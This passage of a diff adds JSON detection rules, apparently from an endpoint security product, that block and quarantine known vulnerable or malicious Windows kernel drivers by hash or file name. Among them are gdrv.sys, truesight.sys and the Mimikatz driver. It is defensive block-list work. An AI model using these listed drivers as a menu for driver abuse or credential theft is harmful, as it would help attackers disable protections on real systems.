"2026-03-23T11:45:29.609547Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b5433ec27586bdd8d2ef606f9212d8ed75ae3ae2e201a1acaf325d9b12239df8", + "comment": "Gigabyte vulnerable driver (aka gdrv.sys) [CVE-2018-19320] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6aab1a7b-6d25-57a3-b4d4-18edb5bd340d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.609041Z", + "creation_date": "2026-03-23T11:45:29.609043Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.609048Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "17927b93b2d6ab4271c158f039cae2d60591d6a14458f5a5690aec86f5d54229", + "comment": "Gigabyte vulnerable driver (aka gdrv.sys) [CVE-2018-19320] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6aac6845-a0b9-5b58-90ab-518a73c39e9a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + 
"username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.487558Z", + "creation_date": "2026-03-23T11:45:31.487560Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.487566Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "34a49a7c6263fab5bb04eca3a281865480cc26183b4a09aa27f54948e9b3f211", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6aae14c1-b24d-54ab-83dc-4f746eaf28f7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.826639Z", + "creation_date": "2026-03-23T11:45:30.826641Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.826646Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4a42fbb4f43ce223f272ab104cb4548d65b51370e7e3309bbecf94f78f388d0d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6ab2c510-a228-5c45-9d53-5558473c722e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.604071Z", + "creation_date": "2026-03-23T11:45:29.604073Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.604079Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8be482157bdb504cc35f1126e31f240e0faf6890790c65c58ec3328f58c780d8", + "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6ab3aa6a-a9f1-5cd2-beef-4bdb06dc2ea0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.832902Z", + "creation_date": "2026-03-23T11:45:30.832905Z", + "enabled": true, + 
"block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.832913Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "17af7d992ea688cb58092a9cb4e97242dee798b6b8598df58919bd816a487f72", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6abe76f7-30e2-5058-9049-75c7645e33a3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.979567Z", + "creation_date": "2026-03-23T11:45:29.979569Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.979575Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e307ebe2d43cc8e290e5ade032a6e38bc6961439f92d6e99b954bf1368a975ef", + "comment": "Malicious Kernel Driver (aka windbg.sys) [https://www.loldrivers.io/drivers/da7314dc-6cf1-4d74-a0d1-796fc08944f8/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6ac353ef-113a-5248-aa3e-db023b0e14b4", + "test_maturity_current_count": 0, + "test_maturity_delay": 
7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.491195Z", + "creation_date": "2026-03-23T11:45:31.491198Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.491206Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "aa5453e36a0bb0cef26d3708ef568443e42bfe2780db5bc2ac9f8e0dacf35243", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6ac6cbb3-b6cd-5fe3-b382-efd22faf55e2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.492701Z", + "creation_date": "2026-03-23T11:45:31.492705Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.492714Z", + "rule_level": null, + "rule_level_override": 
null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "965428e52c4c1cb355cbac05e8dd5549fa46e71d10d7c8766e2603df5ac048d4", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6acaf915-d2be-5af7-9ac0-ad0b2b9137f3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.149396Z", + "creation_date": "2026-03-23T11:45:31.149399Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.149408Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "96145b53c3844ec1ddc23fb0ef29cb17e297a0bdec6215d5f4d62ebda5e62a6b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6ae23888-b7cf-5232-a08a-ece352b71c8c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.971176Z", + "creation_date": "2026-03-23T11:45:29.971179Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.971187Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "filename", + "value": "mimidrv.sys", + "comment": "Mimikatz kernel driver (aka mimidrv.sys) [https://github.com/gentilkiwi/mimikatz] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6aed2c9c-f9c0-5a13-8631-0a0902f6da1e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.833372Z", + "creation_date": "2026-03-23T11:45:30.833376Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.833384Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "48b6357abca6278706e2c431fd1cc34a2ab7971b65e496cf19f164a602838a34", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka 
truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6af166f6-b9f4-547e-8d45-e6831447f86c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.494083Z", + "creation_date": "2026-03-23T11:45:31.494086Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.494095Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c78e942bbdff760ab41f3266bc593114e35a15d3f46b5de370a21f2c3ea4e5b0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6b0cbdc8-a97b-5df4-95ec-48dca8cb3c73", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.144939Z", + 
"creation_date": "2026-03-23T11:45:32.144941Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.144946Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d1598c68202647a9d029b0abb2737f3701359ab433677b51bd83459de7155677", + "comment": "Malicious Kernel Driver (aka driver_290bc782.sys) [https://www.loldrivers.io/drivers/f5c1a46f-21e6-4b06-b212-2dc55b699497/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6b0f6788-686d-55dd-982a-84b9f2cc1f01", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.457393Z", + "creation_date": "2026-03-23T11:45:30.457397Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.457405Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8ef59605ebb2cb259f19aba1a8c122629c224c58e603f270eaa72f516277620c", + "comment": "Vulnerable Kernel Driver (aka rtkio64.sys ) [https://www.loldrivers.io/drivers/8d3f27bd-c3fd-48d0-913a-e2caa6fbd025/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6b12aa25-1b3f-5956-8b57-7e1d8ad018e0", + "test_maturity_current_count": 0, + 
"test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.968987Z", + "creation_date": "2026-03-23T11:45:29.968989Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.968995Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8cfd5b2102fbc77018c7fe6019ec15f07da497f6d73c32a31f4ba07e67ec85d9", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6b17b320-4771-523e-ae8a-b69080f409e2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.614579Z", + "creation_date": "2026-03-23T11:45:29.614581Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.614587Z", + "rule_level": null, + "rule_level_override": null, + 
"rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "56a3c9ac137d862a85b4004f043d46542a1b61c6acb438098a9640469e2d80e7", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6b1eedb3-df77-5a25-91b6-90a19bf2d768", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.967148Z", + "creation_date": "2026-03-23T11:45:29.967151Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.967160Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "15cf3ce2a0ee32488de26222492842a378d6b8af6924578b35dac89fb0c7cb5c", + "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6b27bb1d-47f9-5210-a780-c005f61d445c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", 
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.483372Z", + "creation_date": "2026-03-23T11:45:31.483376Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.483386Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9f5e3fb2163d42e5c48164c02eda6e3da31c42d054f4103cea2f1c0da445d843", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6b294ad6-d7b5-5293-b497-fc6da62d6048", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.618202Z", + "creation_date": "2026-03-23T11:45:29.618204Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.618209Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"835733590a778f48dae1df4e33da8455b89449fed3e04fa19b64bbdcb6a530db", + "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6b2af974-52f1-570a-bcae-a6d2e57afe0a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.819324Z", + "creation_date": "2026-03-23T11:45:30.819326Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.819331Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "39b8c4549fcf28f4b5d8aee04bf170f648272197a631c3487a34fdb8d4a826b6", + "comment": "Vulnerable Kernel Driver (aka hwdetectng.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6b386362-a615-5dc2-94ca-e74e89620d75", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": 
false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.973269Z", + "creation_date": "2026-03-23T11:45:29.973271Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.973277Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c1bbe628f79528417ea741dfad2f589fc4e5c62152e632a89ed080da029d5384", + "comment": "Elaborate Bytes vulnerable driver (aka ElbyCDIO.sys) [CVE-2009-0824] [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6b3bb91b-dd74-5605-9ca2-cf34e93456a9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.475444Z", + "creation_date": "2026-03-23T11:45:31.475447Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.475457Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e1335392b288a7006aa03d289559998f8870b9bdca139e12e3f7c5a1c14b8304", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka 
truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6b4021dc-d69f-5e00-97e4-0e582ffa8778", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.809026Z", + "creation_date": "2026-03-23T11:45:31.809028Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.809034Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "93710294ca4c54305bbd016842276f32b8895002c6c2ff09e653ceb3bc05dec0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6b43793f-c824-5758-a3fc-74a4e77739c9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.827699Z", + 
"creation_date": "2026-03-23T11:45:30.827701Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.827706Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cc5df3459b53df65b45eaf3541723192563133f9d07f4aee68c21556d5ac4bb9", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6b5c7d85-f321-5794-91c0-530f342867ed", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + 